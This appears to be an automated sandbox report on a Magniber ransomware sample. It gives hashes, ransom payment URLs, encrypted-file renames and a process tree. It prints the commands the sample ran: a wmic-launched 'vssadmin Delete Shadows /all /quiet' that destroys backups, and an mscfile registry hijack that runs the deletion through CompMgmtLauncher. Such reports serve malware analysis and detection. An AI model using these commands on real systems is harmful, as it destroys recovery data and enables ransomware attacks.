Analysis
-
max time kernel
122s -
max time network
154s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-05-2021 11:01
Static task
static1
Behavioral task
behavioral1
Sample
c6b6ec00_by_Libranalysis.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
c6b6ec00_by_Libranalysis.exe
Resource
win10v20210410
General
-
Target
c6b6ec00_by_Libranalysis.exe
-
Size
22KB
-
MD5
c6b6ec00b64069d66c8d14d65f7cfd8f
-
SHA1
b90e6bf12728fa3b0984aabc32b39f1db082a1da
-
SHA256
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed
-
SHA512
c9d7c97c63806e87804c33530f48ba950542ba28421d354cb287c9bf027ff5a853b76200e87eadd3cde0469f4b8c93f8c4bc0e71f5e4aa1cdf33e05c0673254a
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://50b03ce896784a70d4csnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.jobsbig.cam/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.nowuser.casa/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.boxgas.icu/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.bykeep.club/csnwyqmwa
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 1396 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1316 1396 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 1396 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1576 1396 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2668 1396 vssadmin.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2660 1396 vssadmin.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2652 1396 vssadmin.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 1396 vssadmin.exe 48 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 11 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\CompleteDeny.tif => C:\Users\Admin\Pictures\CompleteDeny.tif.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\GetWrite.png => C:\Users\Admin\Pictures\GetWrite.png.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\ResolveSave.tiff => C:\Users\Admin\Pictures\ResolveSave.tiff.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\SendJoin.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\UseNew.tiff => C:\Users\Admin\Pictures\UseNew.tiff.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\RevokeSave.raw => C:\Users\Admin\Pictures\RevokeSave.raw.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\SearchSet.raw => C:\Users\Admin\Pictures\SearchSet.raw.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\ExitTest.tif => C:\Users\Admin\Pictures\ExitTest.tif.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\ResolveSave.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\SendJoin.tiff => C:\Users\Admin\Pictures\SendJoin.tiff.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\UseNew.tiff taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1920 set thread context of 1124 1920 c6b6ec00_by_Libranalysis.exe 7 PID 1920 set thread context of 1172 1920 c6b6ec00_by_Libranalysis.exe 6 PID 1920 set thread context of 1252 1920 c6b6ec00_by_Libranalysis.exe 5 -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2756 vssadmin.exe 2668 vssadmin.exe 2660 vssadmin.exe 2652 vssadmin.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e4500000000002000000000010660000000100002000000011fa0e6c400dba38922cd71f14098a00b0c8c0387b68fe1e1443bd778463e80d000000000e8000000002000020000000adf32010815a69779a8e4c6d13cc34db9f5e87d51619f9145c66e5a7040a80bd20000000ea350475971010e22b9da448a13e633f69fb2ad0fbda8e0842fb8195b0384fe8400000007675334ce95b5690f875f7b8d0b4d6a2d9fefe6aac3a0a2f3d0d9abf2e9f9cd22ad5ab11a851a4044ece11ec464d598811791dd1efe7bdabd5bf5607cbe71ca7 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e450000000000200000000001066000000010000200000009c1a4d6a61f881ac43d56dfa9486d77b76fac9e8b1328a8d5038d7b590309956000000000e80000000020000200000004575ca9b47055ab632ca297f8a5d8f34774fcf0c25602e4afb205e9f7d4c1eef900000003755f37bd1e76b3f463bce88ecae414fd3262e68fa0f6ca4984c0ced480b8f9840d38e759bcd9f9f0a1c0320e983ac9a7244b05a2e7e34c7681b8cbaba094e8d2ab8d1ce012357d716b5a418e65bc3f03a6e0d719951fd20a984763d1b4c7e81d4fa1411dd21866c1ef798ee1d24ee27ad0448e867ccbaa6cfac9f611fd69eefb3fd5e279062d1ccf35615ae22284ea1400000002fedb0c1bec437f4183314c01b20a33ae2c19e4557cada7334d6cf612f4c8e894b0a4ada27841af2ee943b888553a0698e317bf8ec147d4579781165b8683692 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d09a34420a4fd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "327850180" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{59F34BE1-BAFD-11EB-A5E9-5E661A0063E2} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Process not Found Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open taskhost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 780 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1920 c6b6ec00_by_Libranalysis.exe 1920 c6b6ec00_by_Libranalysis.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1920 c6b6ec00_by_Libranalysis.exe 1920 c6b6ec00_by_Libranalysis.exe 1920 c6b6ec00_by_Libranalysis.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1908 WMIC.exe Token: SeSecurityPrivilege 1908 WMIC.exe Token: SeTakeOwnershipPrivilege 1908 WMIC.exe Token: SeLoadDriverPrivilege 1908 WMIC.exe Token: SeSystemProfilePrivilege 1908 WMIC.exe Token: SeSystemtimePrivilege 1908 WMIC.exe Token: SeProfSingleProcessPrivilege 1908 WMIC.exe Token: SeIncBasePriorityPrivilege 1908 WMIC.exe Token: SeCreatePagefilePrivilege 1908 WMIC.exe Token: SeBackupPrivilege 1908 WMIC.exe Token: SeRestorePrivilege 1908 WMIC.exe Token: SeShutdownPrivilege 1908 WMIC.exe Token: SeDebugPrivilege 1908 WMIC.exe Token: SeSystemEnvironmentPrivilege 1908 WMIC.exe Token: SeRemoteShutdownPrivilege 1908 WMIC.exe Token: SeUndockPrivilege 1908 WMIC.exe Token: SeManageVolumePrivilege 1908 WMIC.exe Token: 33 1908 WMIC.exe Token: 34 1908 WMIC.exe Token: 35 1908 WMIC.exe Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1676 WMIC.exe Token: SeSecurityPrivilege 1676 WMIC.exe Token: SeTakeOwnershipPrivilege 1676 WMIC.exe Token: SeLoadDriverPrivilege 1676 WMIC.exe Token: SeSystemProfilePrivilege 1676 WMIC.exe Token: SeSystemtimePrivilege 1676 WMIC.exe Token: SeProfSingleProcessPrivilege 1676 WMIC.exe Token: SeIncBasePriorityPrivilege 1676 WMIC.exe Token: SeCreatePagefilePrivilege 1676 WMIC.exe Token: SeBackupPrivilege 1676 WMIC.exe Token: SeRestorePrivilege 1676 WMIC.exe Token: SeShutdownPrivilege 1676 WMIC.exe Token: SeDebugPrivilege 1676 WMIC.exe Token: SeSystemEnvironmentPrivilege 1676 WMIC.exe Token: SeRemoteShutdownPrivilege 1676 WMIC.exe Token: SeUndockPrivilege 1676 WMIC.exe Token: SeManageVolumePrivilege 1676 WMIC.exe Token: 33 1676 WMIC.exe Token: 34 1676 WMIC.exe Token: 35 1676 WMIC.exe Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeIncreaseQuotaPrivilege 556 WMIC.exe Token: SeSecurityPrivilege 556 WMIC.exe Token: SeTakeOwnershipPrivilege 556 WMIC.exe Token: SeLoadDriverPrivilege 556 WMIC.exe Token: SeSystemProfilePrivilege 556 WMIC.exe Token: SeSystemtimePrivilege 556 WMIC.exe Token: SeProfSingleProcessPrivilege 556 WMIC.exe Token: SeIncBasePriorityPrivilege 556 WMIC.exe Token: SeCreatePagefilePrivilege 556 WMIC.exe Token: SeBackupPrivilege 556 WMIC.exe Token: SeRestorePrivilege 556 WMIC.exe Token: SeShutdownPrivilege 556 WMIC.exe Token: SeDebugPrivilege 556 WMIC.exe Token: SeSystemEnvironmentPrivilege 556 WMIC.exe Token: SeRemoteShutdownPrivilege 556 WMIC.exe Token: SeUndockPrivilege 556 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1252 Explorer.EXE 1804 iexplore.exe 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1804 iexplore.exe 1804 iexplore.exe 2100 IEXPLORE.EXE 2100 IEXPLORE.EXE 2100 IEXPLORE.EXE 2100 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1124 wrote to memory of 780 1124 taskhost.exe 26 PID 1124 wrote to memory of 780 1124 taskhost.exe 26 PID 1124 wrote to memory of 780 1124 taskhost.exe 26 PID 1124 wrote to memory of 1404 1124 taskhost.exe 30 PID 1124 wrote to memory of 1404 1124 taskhost.exe 30 PID 1124 wrote to memory of 1404 1124 taskhost.exe 30 PID 1124 wrote to memory of 1864 1124 taskhost.exe 31 PID 1124 wrote to memory of 1864 1124 taskhost.exe 31 PID 1124 wrote to memory of 1864 1124 taskhost.exe 31 PID 1864 wrote to memory of 1908 1864 cmd.exe 35 PID 1864 wrote to memory of 1908 1864 cmd.exe 35 PID 1864 wrote to memory of 1908 1864 cmd.exe 35 PID 1172 wrote to memory of 1540 1172 Dwm.exe 36 PID 1172 wrote to memory of 1540 1172 Dwm.exe 36 PID 1172 wrote to memory of 1540 1172 Dwm.exe 36 PID 1252 wrote to memory of 1728 1252 Explorer.EXE 39 PID 1252 wrote to memory of 1728 1252 Explorer.EXE 39 PID 1252 wrote to memory of 1728 1252 Explorer.EXE 39 PID 1404 wrote to memory of 1804 1404 cmd.exe 37 PID 1404 wrote to memory of 1804 1404 cmd.exe 37 PID 1404 wrote to memory of 1804 1404 cmd.exe 37 PID 1728 wrote to memory of 1676 1728 cmd.exe 42 PID 1728 wrote to memory of 1676 1728 cmd.exe 42 PID 1728 wrote to memory of 1676 1728 cmd.exe 42 PID 1920 wrote to memory of 1680 1920 Process not Found 40 PID 1920 wrote to memory of 1680 1920 Process not Found 40 PID 1920 wrote to memory of 1680 1920 Process not Found 40 PID 1680 wrote to memory of 556 1680 cmd.exe 43 PID 1680 wrote to memory of 556 1680 cmd.exe 43 PID 1680 wrote to memory of 556 1680 cmd.exe 43 PID 1920 wrote to memory of 284 1920 Process not Found 44 PID 1920 wrote to memory of 284 1920 Process not Found 44 PID 1920 wrote to memory of 284 1920 Process not Found 44 PID 284 wrote to memory of 764 284 cmd.exe 46 PID 284 wrote to memory of 764 284 cmd.exe 46 PID 284 wrote to memory of 764 284 cmd.exe 46 PID 1804 wrote to memory of 2100 1804 iexplore.exe 57 PID 1804 wrote to memory of 2100 1804 iexplore.exe 57 PID 1804 wrote to memory of 2100 1804 iexplore.exe 57 PID 1804 wrote to memory of 2100 1804 iexplore.exe 57 PID 1576 wrote to memory of 2124 1576 cmd.exe 61 PID 1576 wrote to memory of 2124 1576 cmd.exe 61 PID 1576 wrote to memory of 2124 1576 cmd.exe 61 PID 1688 wrote to memory of 2132 1688 cmd.exe 60 PID 1688 wrote to memory of 2132 1688 cmd.exe 60 PID 1688 wrote to memory of 2132 1688 cmd.exe 60 PID 1316 wrote to memory of 2144 1316 cmd.exe 59 PID 1316 wrote to memory of 2144 1316 cmd.exe 59 PID 1316 wrote to memory of 2144 1316 cmd.exe 59 PID 1784 wrote to memory of 2184 1784 cmd.exe 58 PID 1784 wrote to memory of 2184 1784 cmd.exe 58 PID 1784 wrote to memory of 2184 1784 cmd.exe 58 PID 2132 wrote to memory of 2400 2132 CompMgmtLauncher.exe 63 PID 2132 wrote to memory of 2400 2132 CompMgmtLauncher.exe 63 PID 2132 wrote to memory of 2400 2132 CompMgmtLauncher.exe 63 PID 2144 wrote to memory of 2408 2144 CompMgmtLauncher.exe 62 PID 2144 wrote to memory of 2408 2144 CompMgmtLauncher.exe 62 PID 2144 wrote to memory of 2408 2144 CompMgmtLauncher.exe 62 PID 2124 wrote to memory of 2424 2124 CompMgmtLauncher.exe 64 PID 2124 wrote to memory of 2424 2124 CompMgmtLauncher.exe 64 PID 2124 wrote to memory of 2424 2124 CompMgmtLauncher.exe 64 PID 2184 wrote to memory of 2456 2184 CompMgmtLauncher.exe 66 PID 2184 wrote to memory of 2456 2184 CompMgmtLauncher.exe 66 PID 2184 wrote to memory of 2456 2184 CompMgmtLauncher.exe 66
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe"C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1920 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:284 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:764
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵PID:1540
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:780
-
-
C:\Windows\system32\cmd.execmd /c "start http://50b03ce896784a70d4csnwyqmwa.jobsbig.cam/csnwyqmwa^&1^&47038039^&81^&363^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://50b03ce896784a70d4csnwyqmwa.jobsbig.cam/csnwyqmwa&1&47038039&81&363&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1804 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2100
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2400
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2408
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2456
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2424
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2668
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2660
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2652
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2756
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2824